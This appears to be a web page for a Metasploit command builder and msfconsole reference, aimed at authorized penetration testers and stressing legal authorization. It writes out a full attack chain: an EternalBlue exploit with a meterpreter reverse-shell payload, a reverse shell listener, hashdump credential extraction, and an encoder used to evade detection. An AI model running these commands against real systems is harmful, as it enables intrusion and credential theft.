Home/Tools/Metasploit Command Builder & Console Reference

Metasploit Command Builder & Console Reference

Visual Metasploit command generator with module presets, payload selector, and comprehensive msfconsole command reference.

How to Use This Builder

  1. Start with a quick scenario or search for a module. Hover over the info icons if you need a refresher on any field.
  2. Fill in target details (RHOST/RHOSTS, ports, listener values) and choose payload or extra options.
  3. Click Add module to workflow to stage the step, then repeat to string together scans, exploits, and post modules.
  4. Copy the generated script and paste it into msfconsole or save it as a .rc resource file.

Pro tip: give each workflow step a label so the generated commands are self-documenting when you run them later.

Typical Metasploit Workflow

  1. Reconnaissance: Discover live hosts and exposed services.
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.1.0/24
    run
  2. Vulnerability Identification: Map services to known Metasploit modules.
    search type:exploit platform:windows smb
    info exploit/windows/smb/ms17_010_eternalblue
  3. Exploitation: Configure and launch the chosen module.
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOST 192.168.1.10
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.5
    exploit
  4. Post-Exploitation: Enumerate the compromised system and maintain access.
    sysinfo
    getuid
    run post/windows/gather/enum_system
    hashdump
  5. Reporting & Cleanup: Document results and close out sessions.
    sessions -l
    sessions -K
    hosts
    services

Quick Scenarios

Discover live hosts, exposed services, and versions.

🔍 TCP Port Sweep

Scan network ranges for open TCP services.

auxiliary/scanner/portscan/tcp
📡 Probe SMB Versions

Identify SMB versions to flag legacy or vulnerable systems.

auxiliary/scanner/smb/smb_version
🗂️ HTTP Directory Busting

Bruteforce hidden paths and admin panels on web servers.

auxiliary/scanner/http/dir_scanner

Module Selection

Popular Modules:

Module Workflow

Add each configured module to build a multi-step exploitation or scanning sequence.

Optional, but helpful when running multiple modules.

Queue multiple modules to generate a ready-to-run sequence.

Target Configuration

Payload & Options

Format: OPTION_NAME value (set will be added automatically)

Generated MSFconsole Commands

Run these commands in msfconsole. Review options before executing.
# Select or search for a module to begin

Legal & Ethical Warning

Only use Metasploit on systems you own or have explicit written authorization to test. Unauthorized penetration testing is illegal and may violate laws including the Computer Fraud and Abuse Act (CFAA). This tool is for authorized security testing and education only.

Need Professional Security Services?

Our cybersecurity experts can help protect your business with comprehensive security solutions.

Get Security AssessmentView Services

How the Metasploit Command Builder Works

The Metasploit Command Builder provides a visual interface to construct msfconsole commands without memorizing complex module paths and options. It includes two powerful features:

1. Command Builder

Select modules and configure options visually to generate ready-to-use msfconsole commands:

  • Quick Scenarios - One-click presets for reverse handlers, port scanning, and popular exploits
  • Module Search - Search from 15+ popular modules or enter custom module paths
  • Target Configuration - Set RHOSTS, RHOST, RPORT, LHOST, LPORT with guidance
  • Payload Selection - Choose from reverse shells, Meterpreter, and platform-specific payloads
  • Advanced Options - Configure threads, verbosity, auto-run scripts, and custom options

2. Console Reference

Comprehensive msfconsole command reference organized by category:

  • Search & Discovery - Find modules by type, platform, CVE, and keywords
  • Module Management - Load modules, configure options, manage payloads
  • Session Management - List, interact, upgrade, and manage active sessions
  • Meterpreter Commands - Essential post-exploitation commands
  • Database Commands - Workspace management and result tracking

Metasploit Framework Basics

Module TypePurposeExample
ExploitsTake advantage of vulnerabilities to gain accessexploit/windows/smb/ms17_010_eternalblue
AuxiliaryScanning, fuzzing, DOS, and other non-exploit tasksauxiliary/scanner/smb/smb_version
PayloadsCode that runs on target after exploitationwindows/meterpreter/reverse_tcp
PostPost-exploitation modules for compromised systemspost/windows/gather/hashdump
EncodersObfuscate payloads to evade detectionx86/shikata_ga_nai

Common Payload Types

PayloadDescriptionUse Case
generic/shell_reverse_tcpBasic command shell (Linux/Unix)Simple reverse shell access
windows/meterpreter/reverse_tcpFull-featured Windows MeterpreterAdvanced Windows post-exploitation
linux/x64/meterpreter/reverse_tcpLinux 64-bit MeterpreterAdvanced Linux post-exploitation
cmd/unix/reverseUnix command shellBasic Unix/Linux access
python/meterpreter/reverse_tcpPython-based MeterpreterCross-platform with Python

Metasploit Best Practices

✅ Do's

  • • Obtain written authorization before any testing
  • • Use workspaces to organize different engagements
  • • Run "check" before exploit to verify vulnerability
  • • Document all actions and findings thoroughly
  • • Use resource scripts to automate repetitive tasks
  • • Keep Metasploit updated: msfupdate
  • • Background sessions when switching between tasks

❌ Don'ts

  • • Never test without explicit written permission
  • • Don't exceed authorized scope or timeframe
  • • Avoid causing system crashes or data loss
  • • Don't leave backdoors or persistence mechanisms
  • • Never exfiltrate sensitive data without approval
  • • Don't ignore legal and compliance requirements
  • • Avoid running untrusted exploit code blindly

Typical Metasploit Workflow

  1. 1.
    Reconnaissance: Use auxiliary scanners to discover hosts, services, and versions
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.1.0/24
    run
  2. 2.
    Vulnerability Identification: Search for relevant exploits based on discovered services
    search type:exploit platform:windows smb
    info exploit/windows/smb/ms17_010_eternalblue
  3. 3.
    Exploitation: Configure and run the exploit module
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOST 192.168.1.10
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.5
    exploit
  4. 4.
    Post-Exploitation: Gather information and maintain access
    sysinfo
    getuid
    run post/windows/gather/enum_system
    hashdump
  5. 5.
    Reporting: Document findings and clean up
    sessions -l
    sessions -K
    hosts
    services

Quick Command Examples

Set up reverse shell listener:
use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
exploit -j
Scan network for SMB vulnerabilities:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
set THREADS 20
run
Search for specific exploits:
search cve:2017 type:exploit platform:linux
Upgrade shell to Meterpreter:
sessions -u 1
Import nmap results:
db_import /path/to/nmap-output.xml

⚖️ Legal & Ethical Reminder

Unauthorized use of Metasploit or any penetration testing tools is illegal in most jurisdictions and may violate the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide. This tool is intended for authorized security professionals conducting legitimate penetration tests with explicit written permission. Always obtain proper authorization, stay within scope, follow rules of engagement, and comply with all applicable laws and regulations.

📚 Learning Resources

  • Official Documentation: Metasploit Unleashed - Free online course by Offensive Security
  • Practice Safely: Use vulnerable VM environments like Metasploitable, DVWA, and HackTheBox
  • Stay Updated: Follow Rapid7 blog for new modules and vulnerability research
  • Certifications: Consider OSCP, CEH, or GPEN for professional penetration testing credentials

Frequently Asked Questions

Common questions about the Metasploit Command Builder & Console Reference

Metasploit is the world's most popular penetration testing framework. It provides security professionals with tools to discover, exploit, and validate vulnerabilities in systems and applications. Metasploit includes thousands of exploit modules, payloads, auxiliary scanners, and post-exploitation tools. It's used for authorized security assessments, vulnerability validation, and developing security defenses.

Explore More Tools

Continue with these related tools

Security
🔐

Password Strength Checker

Test your password strength and get recommendations for improvement

Try it now
Security
🔑

Password Generator

Generate secure random passwords with customizable options

Try it now
Security
🔍

CVE Vulnerability Search

Search and analyze CVE vulnerabilities with CVSS calculator

Try it now

⚠️ Security Notice

This tool is provided for educational and authorized security testing purposes only. Always ensure you have proper authorization before testing any systems or networks you do not own. Unauthorized access or security testing may be illegal in your jurisdiction. All processing happens client-side in your browser - no data is sent to our servers.